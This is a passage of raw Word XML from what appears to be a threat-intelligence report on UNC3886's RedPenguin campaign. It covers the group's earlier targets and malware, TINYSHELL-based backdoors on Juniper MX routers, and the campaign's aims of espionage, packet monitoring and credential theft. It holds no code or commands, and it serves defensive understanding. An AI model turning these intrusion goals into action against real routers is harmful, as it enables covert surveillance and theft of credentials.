          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Network security appliances </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677641DF" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNC3886 is considered highly advanced because it frequently exploits zero-day vulnerabilities, develops custom malware, and demonstrates deep knowledge of operating system internals and network infrastructure. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6448DE31" w14:textId="7A81FA8F" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Before the RedPenguin campaign, UNC3886 was linked to attacks involving:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A80DB76" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fortinet firewalls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7019A8" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VMware ESXi hypervisors </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13950911" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Network appliances and virtualization environments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57898C25" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The group previously used malware families such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D23F68" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASTLETAP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D75C0F" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MEDUSA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF39F23" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MOPSLED </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8A8A54" w14:textId="28CD7CF1" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>These tools enabled stealthy persistence, encrypted communication, and network traffic monitoring. UNC3886 typically targets organizations that manage large-scale or sensitive communications infrastructure, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E99BE0" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Telecom providers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D8E4E" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Defense contractors </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62192D6F" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Government-linked infrastructure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF0F920" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Technology companies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09923FDB" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In the RedPenguin campaign, the group targeted </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Juniper MX routers</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> running </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Junos OS</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Mandiant researchers discovered several customized </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TINYSHELL-based backdoors</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployed on compromised routers, showing the attackers’ deep understanding of Junos OS internals. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA87885" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The reason UNC3886 attacks routers and edge devices is because they provide:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C24567E" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Long-term hidden access</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916E0E3" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Visibility into network traffic </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE3862" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Opportunities for packet sniffing and espionage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6585F239" w14:textId="77777777" w:rsidR="006537E8" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00B42FCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Easier evasion from traditional endpoint security tools </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3C8D0" w14:textId="1919B551" w:rsidR="00AD249E" w:rsidRPr="003168F2" w:rsidRDefault="006537E8" w:rsidP="00AD249E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">By compromising routers instead of user endpoints, attackers can monitor communications across entire networks while remaining difficult to detect. This makes routers valuable targets for state-sponsored intelligence gathering operations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E4099" w14:textId="77777777" w:rsidR="003168F2" w:rsidRDefault="003168F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB92D36" w14:textId="0D5EB93D" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="00AD249E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0621C26A" wp14:editId="4A759A44">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1857375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-48260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="433952930" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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A3E4C76" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:146.25pt;margin-top:-3.8pt;width:240pt;height:33.75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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CC017C" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Objectives of the Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2AED71" w14:textId="01C60FB2" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="00AD249E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E49B1BD" w14:textId="5D422603" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Long-term espionage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2261F3" w14:textId="1E54FFF5" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintain persistent and covert access to enterprise routing infrastructure for continuous surveillance and intelligence gathering over an extended period without detection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58D4EF" w14:textId="72EF8A7F" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network traffic monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511485FC" w14:textId="3C5EB43C" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture, inspect, and analyze packets flowing through compromised routers in order to monitor communications and identify sensitive information transmitted across the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6256F12A" w14:textId="7454399B" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Credential and configuration theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65052B" w14:textId="69BD871A" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Obtain administrative credentials, device configurations, and network topology details to gain deeper access into the environment and support further malicious operations. </w:t>
      </w:r>
    </w:p>
